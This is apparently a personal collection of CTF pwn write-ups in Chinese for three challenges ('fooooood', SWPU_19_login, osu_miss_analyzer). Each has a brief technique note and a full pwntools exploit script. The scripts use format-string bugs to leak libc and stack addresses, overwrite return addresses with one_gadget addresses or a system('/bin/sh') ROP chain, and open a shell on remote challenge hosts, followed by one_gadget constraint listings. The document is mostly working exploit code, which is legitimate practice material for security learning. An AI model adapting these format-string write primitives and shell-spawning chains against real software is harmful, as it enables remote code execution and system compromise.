DAS 6月赛fooooood:
非栈上格式化字符串,但是只有3次有效输入机会,找跳板(1->2->3->value)可以用两次输入写掉栈上i的值为一个大值从而实现多次输入,后面就是非栈上格式化字符串标准打法,劫持ret可以打rop也可以打one_gadget
exp:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
# context(log_level='debug')
# io=remote("node4.buuoj.cn",25718)
io=process("./pwn")
elf=ELF("./pwn")
libc=ELF("./libc-2.23.so")
def sd(cc):
io.sendlineafter(b"what's your favourite food: ", cc)
io.recvuntil(b"Give me your name:")
payload=b"/bin/sh\x00"
io.sendline(payload)
io.recvuntil(b"what's your favourite food: ")
payload="%11$p.%9$p"
io.sendline(payload)
gdb.attach(io)
pause()
io.recvuntil(b"like ")
stack=int(io.recv(14),16)
stack0=stack-0xd0
ret_addr=stack0-0x10
rr=stack0+0xe0
# canary=int(io.recv(18),16)
io.recvuntil(b".")
libc_addr=int(io.recv(14),16)-240-libc.sym[b"__libc_start_main"]
print("stack: "+hex(stack))
print("stack0: "+hex(stack0))
print("libc_addr: "+hex(libc_addr))
one_gadget=[0x45226,0x4527a,0xf03a4,0xf1247]
shell=one_gadget[3]+libc_addr
sys_addr=libc.sym[b"system"]+libc_addr
off0=(stack0-0x24)&0xffff
payload = "%{}c%{}$hn".format(off0,11)
sd(payload)
sd('%100'+'c%37$hhn') #修改i值,增加循环次数
# off1=(off0+0xc+0x8)
off1=ret_addr
def fmt_off(addr,value):
payload = "%{}c%{}$hn".format(addr&0xffff,11)
sd(payload)
payload="%{}c%{}$hhn".format(value&0xff,37)
sd(payload)
for i in range(4):
payload = "%{}c%{}$hhn".format((addr+1+i)&0xff,11)
sd(payload)
payload="%{}c%{}$hhn".format((value>>((i+1)*8))&0xff,37)
sd(payload)
fmt_off(ret_addr,shell) #单字节循环写
for i in range(87):
io.sendline(b"1")
io.interactive()
# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
# rax == NULL
# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
# [rsp+0x30] == NULL
# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
# [rsp+0x50] == NULL
# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
SWPU_19_login
7/30复习一下
32位,劫持main函数返回地址为one_gadget
exp:
from pwn import *
# context(log_level='debug',arch='x86',terminal=['tmux','splitw','-h'])
context(terminal=['tmux','splitw','-h'])
io=remote("node1.anna.nssctf.cn",28348)
# io=process("./login")
elf=ELF("./login")
libc=ELF("./libc-2.27.so")
# gdb.attach(io)
# pause()
sh_addr=0x804b080
io.sendafter(b"name: \n",b"/bin/sh\x00")
io.recvuntil(b"word: \n")
# 6 15
payload=b"%6$p.%15$p"
io.send(payload)
io.recvuntil(b"password: ")
stack_addr=int(io.recv(10),16)
io.recvuntil(b".")
leak_addr=int(io.recv(10),16)-241-libc.sym[b"__libc_start_main"]
ret_addr=stack_addr+0x24
shell=leak_addr+0x3cbf7
print("stack_addr: "+hex(stack_addr))
print("ret_addr: "+hex(ret_addr))
print("leak_addr: "+hex(leak_addr))
print("shell: "+hex(shell))
io.recvuntil(b"again!\n")
payload="%{}c%{}$hn".format(ret_addr&0xffff,22)
io.send(payload)
io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format(shell&0xff,59)
io.send(payload)
io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((ret_addr+1)&0xff,22)
io.send(payload)
io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((shell>>8)&0xff,59)
io.send(payload)
io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((ret_addr+2)&0xff,22)
io.send(payload)
io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((shell>>16)&0xff,59)
io.send(payload)
io.recvuntil(b"again!\n")
io.send(b"wllmmllw")
io.interactive()
# 0x3cbea execve("/bin/sh", esp+0x34, environ)
# constraints:
# esi is the GOT address of libc
# [esp+0x34] == NULL
# 0x3cbec execve("/bin/sh", esp+0x38, environ)
# constraints:
# esi is the GOT address of libc
# [esp+0x38] == NULL
# 0x3cbf0 execve("/bin/sh", esp+0x3c, environ)
# constraints:
# esi is the GOT address of libc
# [esp+0x3c] == NULL
# 0x3cbf7 execve("/bin/sh", esp+0x40, environ)
# constraints:
# esi is the GOT address of libc
# [esp+0x40] == NULL
# 0x6729f execl("/bin/sh", eax)
# constraints:
# esi is the GOT address of libc
# eax == NULL
# 0x672a0 execl("/bin/sh", [esp])
# constraints:
# esi is the GOT address of libc
# [esp] == NULL
# 0x13573e execl("/bin/sh", eax)
# constraints:
# ebx is the GOT address of libc
# eax == NULL
# 0x13573f execl("/bin/sh", [esp])
# constraints:
# ebx is the GOT address of libc
# [esp] == NULL
osu_miss_analyzer
ogg打不通怎么办,栈上布置rop链,这道题卡输入挺恶心的
from pwn import *
context(terminal=['tmux','splitw','-h'])
# io=process('./analyzer')
io=remote("chal.osugaming.lol",7273)
elf=ELF('./analyzer')
libc=elf.libc
# gdb.attach(io,'b *0x4018d9\nc\n')
# pause()
def fi(s,n):
payload = b"\x00\xFB\xD6\x34\x01\x0B\x20\x32\x65\x61\x37\x32\x32\x31\x38\x65"
payload += b"\x35\x36\x38\x30\x66\x33\x62\x63\x31\x65\x32\x39\x36\x66\x63\x64"
payload += b"\x62\x37\x36\x33\x32\x39\x36\x0B"
payload += '{}{}'.format(s,n).encode()
payload += b"\x0B\x20\x66\x63\x36\x64\x63\x33\x64\x61\x62\x65\x30\x64\x63\x34"
payload += b"\x65\x30\x35\x62\x33\x64\x65\x63\x32\x33\x39\x36\x64\x31\x30\x34"
payload += b"\x32\x33\xDF\x02\x06\x00\x00\x00\xC0\x00\x05\x00\x00\x00\x32\x35"
payload += b"\x3A\x01\x4C\x04\x01\x28\x00\x00\x00\x0b"
return payload
payload=fi('\x05','%51$p')
io.sendlineafter(b":\n",payload.hex())
io.recvuntil(b"name: ")
leak_addr=int(io.recv(14),16)-0x29d90
log.success("leak_addr:"+hex(leak_addr))
shell=leak_addr+0xebc81
log.success("shell:"+hex(shell))
pop_rdi=leak_addr+0x000000000002a3e5
ret=leak_addr+0x0000000000029139
leave_ret=leak_addr+0x000000000004da83
str_sh=leak_addr+next(libc.search(b"/bin/sh"))
sys_addr=leak_addr+libc.sym[b"system"]
bss_addr=0x404400
def ab_write(content,addr):
for i in range(6):
tp='%{}c%16$hhn'.format((content>>(8*i))&0xff).ljust(0x10,'a')+p64(addr+i).decode('latin-1')
slen=len(tp)
log.success("slen:"+hex(slen))
payload=fi('\x18',tp)
io.sendlineafter(b":\n",payload.hex())
# ab_write(shell,0x404070)
# ab_write(pop_rdi,bss_addr)
# ab_write(str_sh,bss_addr+8)
# ab_write(sys_addr,bss_addr+16)
## leak stack
payload=fi('\x04','%6$p')
io.sendlineafter(b":\n",payload.hex())
io.recvuntil(b"name: ")
stack_addr=int(io.recv(14),16)
log.success("stack_addr:"+hex(stack_addr))
ret_addr=stack_addr-0x110
# gdb.attach(io,'b *0x401686\nc')
# pause()
ab_write(pop_rdi,bss_addr)
ab_write(str_sh,bss_addr+0x8)
ab_write(sys_addr,bss_addr+0x10)
# gdb.attach(io,'')
# pause()
def fmt_t(addr,ctt,off1,off2):
tp="%{}c%{}$hn".format(addr&0xffff,off1).ljust(0x20,'a')
slen=len(tp)
log.success("slen:"+hex(slen))
payload=fi('\x20',tp)
io.sendlineafter(b":\n",payload.hex())
for i in range(6):
tp="%{}c%{}$hhn".format((addr+i)&0xff,off1).ljust(0x20,'a')
slen=len(tp)
log.success("slen:"+hex(slen))
payload=fi('\x20',tp)
io.sendlineafter(b":\n",payload.hex())
tp1="%{}c%{}$hhn".format((ctt>>((i)*8))&0xff,off2).ljust(0x20,'a')
slen=len(tp1)
log.success("slen:"+hex(slen))
payload=fi('\x20',tp1)
io.sendlineafter(b":\n",payload.hex())
# def fmt_t(addr,ctt,off1,off2):
# io.sendafter(b":\n","%{}c%{}$hn".format(addr&0xffff,off1).hex())
# io.sendafter(b":\n","%{}c%{}$hhn".format(ctt&0xff,off2).hex())
# for i in range(5):
# io.sendafter(b":\n","%{}c%{}$hhn".format((addr+i+1)&0xff,off1))
# io.sendafter(b":\n","%{}c%{}$hhn".format((ctt>>((i+1)*8))&0xff,off2))
fmt_t(ret_addr+0x8,pop_rdi,6,85)
fmt_t(ret_addr+0x10,str_sh,6,85)
fmt_t(ret_addr+0x18,sys_addr,6,85)
fmt_t(ret_addr,ret,6,85)
log.success("stack_addr:"+hex(stack_addr))
log.success("ret_addr:"+hex(ret_addr))
log.success("str_sh:"+hex(str_sh))
log.success("pop_rdi:"+hex(pop_rdi))
io.sendlineafter(b":\n",b"ls")
io.sendline(b"cat flag.txt")
io.interactive()
# 0xebc81 execve("/bin/sh", r10, [rbp-0x70])
# constraints:
# address rbp-0x78 is writable
# [r10] == NULL || r10 == NULL || r10 is a valid argv
# [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
# 0xebc85 execve("/bin/sh", r10, rdx)
# constraints:
# address rbp-0x78 is writable
# [r10] == NULL || r10 == NULL || r10 is a valid argv
# [rdx] == NULL || rdx == NULL || rdx is a valid envp
# 0xebc88 execve("/bin/sh", rsi, rdx)
# constraints:
# address rbp-0x78 is writable
# [rsi] == NULL || rsi == NULL || rsi is a valid argv
# [rdx] == NULL || rdx == NULL || rdx is a valid envp
# 0xebce2 execve("/bin/sh", rbp-0x50, r12)
# constraints:
# address rbp-0x48 is writable
# r13 == NULL || {"/bin/sh", r13, NULL} is a valid argv
# [r12] == NULL || r12 == NULL || r12 is a valid envp
# 0xebd38 execve("/bin/sh", rbp-0x50, [rbp-0x70])
# constraints:
# address rbp-0x48 is writable
# r12 == NULL || {"/bin/sh", r12, NULL} is a valid argv
# [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
# 0xebd3f execve("/bin/sh", rbp-0x50, [rbp-0x70])
# constraints:
# address rbp-0x48 is writable
# rax == NULL || {rax, r12, NULL} is a valid argv
# [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
# 0xebd43 execve("/bin/sh", rbp-0x50, [rbp-0x70])
# constraints:
# address rbp-0x50 is writable
# rax == NULL || {rax, [rbp-0x48], NULL} is a valid argv
# [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
